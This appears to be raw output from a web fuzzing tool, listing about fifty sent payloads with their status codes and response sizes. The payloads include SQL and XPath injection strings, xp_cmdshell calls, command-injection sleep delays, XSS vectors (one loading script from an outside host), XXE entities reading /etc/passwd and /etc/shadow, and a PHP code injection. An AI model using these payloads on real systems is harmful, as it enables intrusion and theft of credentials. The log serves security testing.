00411:  C=200     28 L	      69 W	    755 Ch	  "--sp_password"
00413:  C=200     28 L	      68 W	    741 Ch	  "' UNION SELECT"
00409:  C=200     28 L	      69 W	    755 Ch	  "'; exec xp_regread"
00408:  C=200     28 L	      69 W	    755 Ch	  "'; exec master..xp_cmdshell"
00407:  C=200     28 L	      67 W	    730 Ch	  "exec sp"
00410:  C=200     28 L	      69 W	    755 Ch	  "t'exec master..xp_cmdshell 'nslookup www.google.com'--"
00397:  C=200     28 L	      66 W	    730 Ch	  "replace"
00400:  C=200     28 L	      66 W	    732 Ch	  "bfilename"
00393:  C=200     28 L	      66 W	    729 Ch	  "update"
00396:  C=200     28 L	      66 W	    731 Ch	  "truncate"
00399:  C=200     28 L	      66 W	    730 Ch	  "handler"
00450:  C=200     28 L	      66 W	    725 Ch	  "//"
00449:  C=200     28 L	      66 W	    724 Ch	  "/"
00468:  C=200     28 L	      69 W	    888 Ch	  "<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>"
00395:  C=200     28 L	      66 W	    729 Ch	  "having"
00422:  C=200     28 L	      68 W	    735 Ch	  "'%20or%201=1"
00467:  C=200     28 L	      71 W	    843 Ch	  "<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
00426:  C=200     28 L	      66 W	    739 Ch	  "char%4039%41%2b%40SELECT"
00466:  C=200     28 L	      67 W	    771 Ch	  "<xml ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
00463:  C=200     28 L	      75 W	    908 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>"
00420:  C=200     28 L	      69 W	    755 Ch	  "tz_offset"
00464:  C=200     28 L	      75 W	    908 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>"
00461:  C=200     28 L	      75 W	    907 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>"
00460:  C=200     28 L	      72 W	    865 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
00465:  C=200     28 L	      68 W	    853 Ch	  "<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>"
00462:  C=200     28 L	      75 W	    908 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>"
00458:  C=200     28 L	      66 W	    845 Ch	  "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>"
00456:  C=200     28 L	      68 W	    786 Ch	  "<name>','')); phpinfo(); exit;/*</name>"
00453:  C=200     28 L	      66 W	    725 Ch	  "@*"
00457:  C=200     28 L	      68 W	    795 Ch	  "<![CDATA[<script>var n=0;while(true){n++;}</script>]]>"
00452:  C=200     28 L	      66 W	    726 Ch	  "*/*"
00459:  C=200     28 L	      68 W	    937 Ch	  "<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
00451:  C=200     28 L	      66 W	    726 Ch	  "//*"
00433:  C=200     28 L	      66 W	    725 Ch	  "%2A%7C"
00455:  C=200     28 L	      70 W	    780 Ch	  "x' or name()='username' or 'x'='y"
00448:  C=200     28 L	      70 W	    758 Ch	  "x' or 1=1 or 'x'='y"
00444:  C=200     28 L	      66 W	    724 Ch	  "!"
00446:  C=200     28 L	      70 W	    755 Ch	  "' or 1=1 or ''='"
00447:  C=200     28 L	      68 W	    748 Ch	  "' or ''='"
00443:  C=200     28 L	      66 W	    728 Ch	  "%26"
00445:  C=200     28 L	      66 W	    724 Ch	  "%21"
00439:  C=200     28 L	      66 W	    724 Ch	  "%28"
00438:  C=200     28 L	      66 W	    724 Ch	  "("
00442:  C=200     28 L	      66 W	    727 Ch	  "&"
00431:  C=200     28 L	      66 W	    724 Ch	  "%7C"
00425:  C=200     28 L	      67 W	    731 Ch	  "%20'sleep%2050'"
00429:  C=200     28 L	      66 W	    734 Ch	  "(sqlattempt2)"
00430:  C=200     28 L	      66 W	    724 Ch	  "|"
00424:  C=200     28 L	      69 W	    755 Ch	  "%20$(sleep%2050)"
00432:  C=200     28 L	      66 W	    725 Ch	  "*|"
00423:  C=200     28 L	      68 W	    735 Ch	  "%27%20or%201=1"
00427:  C=200     28 L	      66 W	    727 Ch	  "&apos;%20OR"
00428:  C=200     28 L	      66 W	    739 Ch	  "'sqlattempt1"
00421:  C=200     28 L	      66 W	    727 Ch	  "&lt;&gt;&quot;'%;)(&amp;+"

Total time: 0
Processed Requests: 468
Filtered Requests: 42
Requests/sec.: 0
